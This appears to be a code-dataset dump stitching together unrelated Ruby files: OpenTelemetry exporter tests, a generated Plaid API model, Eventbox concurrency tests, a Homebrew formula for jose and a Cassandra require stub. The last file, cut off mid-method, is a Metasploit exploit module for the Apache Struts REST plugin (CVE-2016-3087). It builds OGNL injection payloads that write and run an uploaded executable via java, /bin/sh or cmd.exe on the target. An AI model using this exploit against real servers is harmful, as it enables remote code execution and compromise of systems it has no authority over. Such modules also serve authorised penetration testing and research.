stub_request(:post, 'https://localhost:4318/v1/traces').to_timeout.then.to_raise('this should not be reached')
span_data = create_span_data
@retry_count = 0
backoff_stubbed_call = lambda do |**_args|
sleep(0.10)
@retry_count += 1
true
end
exporter.stub(:backoff?, backoff_stubbed_call) do
_(exporter.export([span_data], timeout: 0.1)).must_equal(TIMEOUT)
end
ensure
@retry_count = 0
end
it 'returns FAILURE when shutdown' do
exporter.shutdown
result = exporter.export(nil)
_(result).must_equal(FAILURE)
end
it 'returns FAILURE when encryption to receiver endpoint fails' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_raise(OpenSSL::SSL::SSLError.new('enigma wedged'))
span_data = create_span_data
exporter.stub(:backoff?, ->(**_) { false }) do
_(exporter.export([span_data])).must_equal(FAILURE)
end
end
it 'exports a span_data' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
end
it 'handles encoding errors with poise and grace' do
log_stream = StringIO.new
logger = OpenTelemetry.logger
OpenTelemetry.logger = ::Logger.new(log_stream)
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data(total_recorded_attributes: 1, attributes: { 'a' => "\xC2".dup.force_encoding(::Encoding::ASCII_8BIT) })
result = exporter.export([span_data])
_(log_stream.string).must_match(
/ERROR -- : OpenTelemetry error: encoding error for key a and value �/
)
_(result).must_equal(SUCCESS)
ensure
OpenTelemetry.logger = logger
end
it 'handles Zlib gzip compression errors' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_raise(Zlib::DataError.new('data error'))
span_data = create_span_data
exporter.stub(:backoff?, ->(**_) { false }) do
_(exporter.export([span_data])).must_equal(FAILURE)
end
end
it 'exports a span from a tracer' do
stub_post = stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
processor = OpenTelemetry::SDK::Trace::Export::BatchSpanProcessor.new(exporter, max_queue_size: 1, max_export_batch_size: 1)
OpenTelemetry.tracer_provider.add_span_processor(processor)
OpenTelemetry.tracer_provider.tracer.start_root_span('foo').finish
OpenTelemetry.tracer_provider.shutdown
assert_requested(stub_post)
end
it 'compresses with gzip if enabled' do
exporter = OpenTelemetry::Exporter::OTLP::Exporter.new(compression: 'gzip')
stub_post = stub_request(:post, 'https://localhost:4318/v1/traces').to_return do |request|
Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.decode(Zlib.gunzip(request.body))
{ status: 200 }
end
span_data = create_span_data
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
assert_requested(stub_post)
end
it 'batches per resource' do
etsr = nil
stub_post = stub_request(:post, 'https://localhost:4318/v1/traces').to_return do |request|
etsr = Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.decode(request.body)
{ status: 200 }
end
span_data1 = create_span_data(resource: OpenTelemetry::SDK::Resources::Resource.create('k1' => 'v1'))
span_data2 = create_span_data(resource: OpenTelemetry::SDK::Resources::Resource.create('k2' => 'v2'))
result = exporter.export([span_data1, span_data2])
_(result).must_equal(SUCCESS)
assert_requested(stub_post)
_(etsr.resource_spans.length).must_equal(2)
end
it 'translates all the things' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
processor = OpenTelemetry::SDK::Trace::Export::BatchSpanProcessor.new(exporter)
tracer = OpenTelemetry.tracer_provider.tracer('tracer', 'v0.0.1')
other_tracer = OpenTelemetry.tracer_provider.tracer('other_tracer')
trace_id = OpenTelemetry::Trace.generate_trace_id
root_span_id = OpenTelemetry::Trace.generate_span_id
child_span_id = OpenTelemetry::Trace.generate_span_id
client_span_id = OpenTelemetry::Trace.generate_span_id
server_span_id = OpenTelemetry::Trace.generate_span_id
consumer_span_id = OpenTelemetry::Trace.generate_span_id
start_timestamp = Time.now
end_timestamp = start_timestamp + 6
OpenTelemetry.tracer_provider.add_span_processor(processor)
root = with_ids(trace_id, root_span_id) { tracer.start_root_span('root', kind: :internal, start_timestamp: start_timestamp) }
root.status = OpenTelemetry::Trace::Status.ok
root.finish(end_timestamp: end_timestamp)
root_ctx = OpenTelemetry::Trace.context_with_span(root)
span = with_ids(trace_id, child_span_id) { tracer.start_span('child', with_parent: root_ctx, kind: :producer, start_timestamp: start_timestamp + 1, links: [OpenTelemetry::Trace::Link.new(root.context, 'attr' => 4)]) }
span['b'] = true
span['f'] = 1.1
span['i'] = 2
span['s'] = 'val'
span['a'] = [3, 4]
span.status = OpenTelemetry::Trace::Status.error
child_ctx = OpenTelemetry::Trace.context_with_span(span)
client = with_ids(trace_id, client_span_id) { tracer.start_span('client', with_parent: child_ctx, kind: :client, start_timestamp: start_timestamp + 2).finish(end_timestamp: end_timestamp) }
client_ctx = OpenTelemetry::Trace.context_with_span(client)
with_ids(trace_id, server_span_id) { other_tracer.start_span('server', with_parent: client_ctx, kind: :server, start_timestamp: start_timestamp + 3).finish(end_timestamp: end_timestamp) }
span.add_event('event', attributes: { 'attr' => 42 }, timestamp: start_timestamp + 4)
with_ids(trace_id, consumer_span_id) { tracer.start_span('consumer', with_parent: child_ctx, kind: :consumer, start_timestamp: start_timestamp + 5).finish(end_timestamp: end_timestamp) }
span.finish(end_timestamp: end_timestamp)
OpenTelemetry.tracer_provider.shutdown
encoded_etsr = Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.encode(
Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.new(
resource_spans: [
Opentelemetry::Proto::Trace::V1::ResourceSpans.new(
resource: Opentelemetry::Proto::Resource::V1::Resource.new(
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'telemetry.sdk.name', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: 'opentelemetry')),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'telemetry.sdk.language', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: 'ruby')),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'telemetry.sdk.version', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: OpenTelemetry::SDK::VERSION))
]
),
instrumentation_library_spans: [
Opentelemetry::Proto::Trace::V1::InstrumentationLibrarySpans.new(
instrumentation_library: Opentelemetry::Proto::Common::V1::InstrumentationLibrary.new(
name: 'tracer',
version: 'v0.0.1'
),
spans: [
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: root_span_id,
parent_span_id: nil,
name: 'root',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_INTERNAL,
start_time_unix_nano: (start_timestamp.to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_OK
)
),
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: client_span_id,
parent_span_id: child_span_id,
name: 'client',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_CLIENT,
start_time_unix_nano: ((start_timestamp + 2).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_UNSET
)
),
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: consumer_span_id,
parent_span_id: child_span_id,
name: 'consumer',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_CONSUMER,
start_time_unix_nano: ((start_timestamp + 5).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_UNSET
)
),
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: child_span_id,
parent_span_id: root_span_id,
name: 'child',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_PRODUCER,
start_time_unix_nano: ((start_timestamp + 1).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'b', value: Opentelemetry::Proto::Common::V1::AnyValue.new(bool_value: true)),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'f', value: Opentelemetry::Proto::Common::V1::AnyValue.new(double_value: 1.1)),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'i', value: Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 2)),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 's', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: 'val')),
Opentelemetry::Proto::Common::V1::KeyValue.new(
key: 'a',
value: Opentelemetry::Proto::Common::V1::AnyValue.new(
array_value: Opentelemetry::Proto::Common::V1::ArrayValue.new(
values: [
Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 3),
Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 4)
]
)
)
)
],
events: [
Opentelemetry::Proto::Trace::V1::Span::Event.new(
time_unix_nano: ((start_timestamp + 4).to_r * 1_000_000_000).to_i,
name: 'event',
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'attr', value: Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 42))
]
)
],
links: [
Opentelemetry::Proto::Trace::V1::Span::Link.new(
trace_id: trace_id,
span_id: root_span_id,
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'attr', value: Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 4))
]
)
],
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_ERROR
)
)
]
),
Opentelemetry::Proto::Trace::V1::InstrumentationLibrarySpans.new(
instrumentation_library: Opentelemetry::Proto::Common::V1::InstrumentationLibrary.new(
name: 'other_tracer'
),
spans: [
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: server_span_id,
parent_span_id: client_span_id,
name: 'server',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_SERVER,
start_time_unix_nano: ((start_timestamp + 3).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_UNSET
)
)
]
)
]
)
]
)
)
assert_requested(:post, 'https://localhost:4318/v1/traces') do |req|
req.body == encoded_etsr
end
end
end
def with_ids(trace_id, span_id)
OpenTelemetry::Trace.stub(:generate_trace_id, trace_id) do
OpenTelemetry::Trace.stub(:generate_span_id, span_id) do
yield
end
end
end
def create_span_data(name: '', kind: nil, status: nil, parent_span_id: OpenTelemetry::Trace::INVALID_SPAN_ID,
total_recorded_attributes: 0, total_recorded_events: 0, total_recorded_links: 0, start_timestamp: exportable_timestamp,
end_timestamp: exportable_timestamp, attributes: nil, links: nil, events: nil, resource: nil,
instrumentation_library: OpenTelemetry::SDK::InstrumentationLibrary.new('', 'v0.0.1'),
span_id: OpenTelemetry::Trace.generate_span_id, trace_id: OpenTelemetry::Trace.generate_trace_id,
trace_flags: OpenTelemetry::Trace::TraceFlags::DEFAULT, tracestate: nil)
resource ||= OpenTelemetry::SDK::Resources::Resource.telemetry_sdk
OpenTelemetry::SDK::Trace::SpanData.new(name, kind, status, parent_span_id, total_recorded_attributes,
total_recorded_events, total_recorded_links, start_timestamp, end_timestamp,
attributes, links, events, resource, instrumentation_library, span_id, trace_id, trace_flags, tracestate)
end
end
| 46.650564 | 223 | 0.613807 |
21ce1a64c735fd798de4519a1165ee1c7957f8db | 230 | #!/usr/bin/env ruby
#---
# Excerpted from "Everyday Scripting in Ruby"
# We make no guarantees that this code is fit for any purpose.
# Visit http://www.pragmaticprogrammer.com/titles/bmsft for more book information.
#---
ONE=1
| 25.555556 | 82 | 0.730435 |
6a25ac2f60dae274eae0d627dbc5c369ec86c038 | 10,469 | =begin
#The Plaid API
#The Plaid REST API. Please see https://plaid.com/docs/api for more details.
The version of the OpenAPI document: 2020-09-14_1.20.6
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.1.0
=end
require 'date'
require 'time'
module Plaid
# AssetReportCreateRequest defines the request schema for `/asset_report/create`
class AssetReportCreateRequest
# Your Plaid API `client_id`. The `client_id` is required and may be provided either in the `PLAID-CLIENT-ID` header or as part of a request body.
attr_accessor :client_id
# Your Plaid API `secret`. The `secret` is required and may be provided either in the `PLAID-SECRET` header or as part of a request body.
attr_accessor :secret
# An array of access tokens corresponding to the Items that will be included in the report. The `assets` product must have been initialized for the Items during link; the Assets product cannot be added after initialization.
attr_accessor :access_tokens
# The maximum integer number of days of history to include in the Asset Report. If using Fannie Mae Day 1 Certainty, `days_requested` must be at least 61 for new originations or at least 31 for refinancings.
attr_accessor :days_requested
attr_accessor :options
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'client_id' => :'client_id',
:'secret' => :'secret',
:'access_tokens' => :'access_tokens',
:'days_requested' => :'days_requested',
:'options' => :'options'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'client_id' => :'String',
:'secret' => :'String',
:'access_tokens' => :'Array<String>',
:'days_requested' => :'Integer',
:'options' => :'AssetReportCreateRequestOptions'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Plaid::AssetReportCreateRequest` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Plaid::AssetReportCreateRequest`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'client_id')
self.client_id = attributes[:'client_id']
end
if attributes.key?(:'secret')
self.secret = attributes[:'secret']
end
if attributes.key?(:'access_tokens')
if (value = attributes[:'access_tokens']).is_a?(Array)
self.access_tokens = value
end
end
if attributes.key?(:'days_requested')
self.days_requested = attributes[:'days_requested']
end
if attributes.key?(:'options')
self.options = attributes[:'options']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @access_tokens.nil?
invalid_properties.push('invalid value for "access_tokens", access_tokens cannot be nil.')
end
if @access_tokens.length < 1
invalid_properties.push('invalid value for "access_tokens", number of items must be greater than or equal to 1.')
end
if @days_requested.nil?
invalid_properties.push('invalid value for "days_requested", days_requested cannot be nil.')
end
if @days_requested > 730
invalid_properties.push('invalid value for "days_requested", must be smaller than or equal to 730.')
end
if @days_requested < 0
invalid_properties.push('invalid value for "days_requested", must be greater than or equal to 0.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @access_tokens.nil?
return false if @access_tokens.length > 99
return false if @access_tokens.length < 1
return false if @days_requested.nil?
return false if @days_requested > 730
return false if @days_requested < 0
true
end
# Custom attribute writer method with validation
# @param [Object] access_tokens Value to be assigned
def access_tokens=(access_tokens)
if access_tokens.nil?
fail ArgumentError, 'access_tokens cannot be nil'
end
if access_tokens.length < 1
fail ArgumentError, 'invalid value for "access_tokens", number of items must be greater than or equal to 1.'
end
@access_tokens = access_tokens
end
# Custom attribute writer method with validation
# @param [Object] days_requested Value to be assigned
def days_requested=(days_requested)
if days_requested.nil?
fail ArgumentError, 'days_requested cannot be nil'
end
if days_requested > 730
fail ArgumentError, 'invalid value for "days_requested", must be smaller than or equal to 730.'
end
if days_requested < 0
fail ArgumentError, 'invalid value for "days_requested", must be greater than or equal to 0.'
end
@days_requested = days_requested
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
client_id == o.client_id &&
secret == o.secret &&
access_tokens == o.access_tokens &&
days_requested == o.days_requested &&
options == o.options
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[client_id, secret, access_tokens, days_requested, options].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = Plaid.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.311728 | 227 | 0.643232 |
ab99be994853aafae335dfb3562943038d053d78 | 95 | require 'cla_signature_authorizer'
class IclaSignatureAuthorizer < ClaSignatureAuthorizer
end
| 19 | 54 | 0.884211 |
38585af060a27bb316c01c7a880cb5874e5492b5 | 3,255 | require_relative "../test_helper"
class ExamplesConcurrentWorkersTest < Minitest::Test
class ConcurrentWorkers < Eventbox
async_call def init
@tasks = []
@waiting = {}
@working = {}
end
async_call def add_worker(workerid)
worker(workerid)
end
action def worker(workerid)
while n=next_task(workerid)
task_finished(workerid, "#{n} finished")
end
end
yield_call def process(name, result)
if @waiting.empty?
@tasks << [result, name]
else
workerid, input = @waiting.shift
input.yield name
@working[workerid] = result
end
end
private yield_call def next_task(workerid, input)
if @tasks.empty?
@waiting[workerid] = input
else
result, name = @tasks.shift
input.yield name
@working[workerid] = result
end
end
private async_call def task_finished(workerid, result)
@working.delete(workerid).yield result
end
end
def test_concurrent_workers
cw = ConcurrentWorkers.new
values = 10.times.map do |taskid|
Thread.new do
cw.add_worker(taskid) if taskid > 5
cw.process "task #{taskid}"
end
end.map(&:value)
assert_equal 10.times.map { |i| "task #{i} finished" }, values
cw.shutdown!
end
class ConcurrentWorkers2 < ConcurrentWorkers
private def check_work
while @tasks.any? && @waiting.any?
workerid, input = @waiting.shift
result, name = @tasks.shift
input.yield name
@working[workerid] = result
end
end
yield_call def process(name, result)
@tasks << [result, name]
check_work
end
private yield_call def next_task(workerid, input)
@waiting[workerid] = input
check_work
end
end
def test_concurrent_workers2
cw = ConcurrentWorkers2.new
cw.add_worker(0)
values = 10.times.map do |taskid|
Thread.new do
cw.add_worker(taskid) if taskid > 5
cw.process("task #{taskid}")
end
end.map(&:value)
assert_equal 10.times.map{|i| "task #{i} finished" }, values
cw.shutdown!
end
class ConcurrentWorkersWithCallback < ConcurrentWorkers2
async_call def init
super
@notify_when_finished = []
end
async_call def process(name, &block)
@tasks << [block, name]
check_work
end
sync_call def task_finished(workerid, result)
@working.delete(workerid).yield result
if @tasks.empty? && @working.empty?
@notify_when_finished.each(&:yield)
end
end
yield_call def finish_tasks(result)
if @tasks.empty? && @working.empty?
result.yield
else
@notify_when_finished << result
end
end
end
def test_concurrent_workers_with_callback
cw = ConcurrentWorkersWithCallback.new
cw.add_worker(0)
values = Queue.new
10.times do |taskid|
cw.add_worker(taskid) if taskid > 5
cw.process("task #{taskid}") do |result|
values << [taskid, result]
end
end
cw.finish_tasks # should yield block to process
assert_equal 10.times.map{|i| [i, "task #{i} finished"] }, 10.times.map{ values.deq }.sort
cw.shutdown!
end
end
| 23.25 | 94 | 0.626114 |
f84598f8ccf018df3d53e53df7272ff4bd5b68bd | 195 | module Eugeneral
module Comparisons
class GreaterThan < Comparitor
def resolve(args=[])
value_for(subject, args) > value_for(object, args)
end
end
end
end
| 16.25 | 58 | 0.630769 |
1c012e45e0372804ef6830ec0339ed986e5eb4b3 | 1,746 | class Jose < Formula
desc "C-language implementation of Javascript Object Signing and Encryption"
homepage "https://github.com/latchset/jose"
url "https://github.com/latchset/jose/releases/download/v10/jose-10.tar.bz2"
sha256 "5c9cdcfb535c4d9f781393d7530521c72b1dd81caa9934cab6dd752cc7efcd72"
revision 1
bottle do
cellar :any
sha256 "359c58b36bb631623273a77d13431f29ff467e9602f1500f9e4fa761ed0719be" => :catalina
sha256 "358a06afd49f1390ca917969dbb434a75a91bd0de3d8ac981d3eab969670cfe2" => :mojave
sha256 "7a84bdaece281b98dc4a7b0a7fbf05976297126966d14ee2862e007521cdd4ea" => :high_sierra
sha256 "1669bf780ac07ee9a7d216185139aaa6e5c44add352e6da25f02c079694e7ad1" => :sierra
sha256 "c25d394204f9e85075ca1e92d9bbf0fe3c619797f548233ea6b58ddd95045238" => :x86_64_linux
end
depends_on "pkg-config" => :build
depends_on "jansson"
depends_on "[email protected]"
uses_from_macos "zlib"
def install
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make"
system "make", "check"
system "make", "install"
end
test do
system bin/"jose", "jwk", "gen", "-i", '{"alg": "A128GCM"}', "-o", "oct.jwk"
system bin/"jose", "jwk", "gen", "-i", '{"alg": "RSA1_5"}', "-o", "rsa.jwk"
system bin/"jose", "jwk", "pub", "-i", "rsa.jwk", "-o", "rsa.pub.jwk"
system "echo hi | #{bin}/jose jwe enc -I - -k rsa.pub.jwk -o msg.jwe"
output = shell_output("#{bin}/jose jwe dec -i msg.jwe -k rsa.jwk 2>&1")
assert_equal "hi", output.chomp
output = shell_output("#{bin}/jose jwe dec -i msg.jwe -k oct.jwk 2>&1", 1)
assert_equal "Unwrapping failed!", output.chomp
end
end
| 40.604651 | 94 | 0.683849 |
0859b4239de2dedb4d27b23a4bf998b34cc58721 | 810 | # encoding: utf-8
#--
# Copyright 2013-2014 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
require 'cassandra/cluster/schema/replication_strategies/simple'
require 'cassandra/cluster/schema/replication_strategies/network_topology'
require 'cassandra/cluster/schema/replication_strategies/none'
| 36.818182 | 74 | 0.783951 |
7adf4c05b25ad239ec8947be36c185cc2786aca5 | 6,291 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
Execution can be performed when using REST Plugin with ! operator when
Dynamic Method Invocation is enabled.
},
'Author' => [
'Nixawk' # original metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3087' ],
[ 'URL', 'https://www.seebug.org/vuldb/ssvid-91741' ]
],
'Platform' => %w{ java linux win },
'Privileged' => true,
'Targets' =>
[
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DisclosureDate' => 'Jun 01 2016',
'DefaultTarget' => 2))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-rest-showcase/orders/3/']),
OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
], self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def get_target_platform
target.platform.platforms.first
end
def temp_path
@TMPPATH ||= lambda {
path = datastore['TMPPATH']
return nil unless path
case get_target_platform
when Msf::Module::Platform::Windows
slash = '\\'
when
slash = '/'
else
end
unless path.end_with?('/')
path << '/'
end
return path
}.call
end
def send_http_request(payload, params_hash)
uri = normalize_uri(datastore['TARGETURI'])
uri = "#{uri}/#{payload}"
resp = send_request_cgi(
'uri' => uri,
'version' => '1.1',
'method' => 'POST',
'vars_post' => params_hash
)
if resp && resp.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
resp
end
def generate_rce_payload(code)
payload = ""
payload << Rex::Text.uri_encode("#[email protected]@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("#xx.toString.json")
payload << "?"
payload << Rex::Text.uri_encode("#xx:#request.toString")
payload
end
def upload_exec(cmd, filename, content)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
var_f = rand_text_alpha_lower(4)
code = "##{var_a}=new sun.misc.BASE64Decoder(),"
code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),"
code << "##{var_b}.write(new java.math.BigInteger(#parameters.#{var_f}[0], 16).toByteArray()),##{var_b}.close(),"
code << "##{var_c}=new java.io.File(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),##{var_c}.setExecutable(true),"
code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])))"
payload = generate_rce_payload(code)
params_hash = {
var_d => Rex::Text.encode_base64(cmd),
var_e => Rex::Text.encode_base64(filename),
var_f => content
}
send_http_request(payload, params_hash)
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
flag = Rex::Text.rand_text_alpha(5)
code = "##{var_a}[email protected]@getResponse().getWriter(),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.close()"
payload = generate_rce_payload(code)
params_hash = { var_b => flag }
begin
resp = send_http_request(payload, params_hash)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
payload_exe = rand_text_alphanumeric(4 + rand(4))
case target['Platform']
when 'java'
payload_exe = "#{temp_path}#{payload_exe}.jar"
pl_exe = payload.encoded_jar.pack
command = "java -jar #{payload_exe}"
when 'linux'
path = datastore['TMPPATH'] || '/tmp/'
pl_exe = generate_payload_exe
payload_exe = "#{path}#{payload_exe}"
command = "/bin/sh -c #{payload_exe}"
when 'win'
path = temp_path || '.\\'
pl_exe = generate_payload_exe
payload_exe = "#{path}#{payload_exe}.exe"
command = "cmd.exe /c #{payload_exe}"
else
fail_with(Failure::NoTarget, 'Unsupported target platform!')
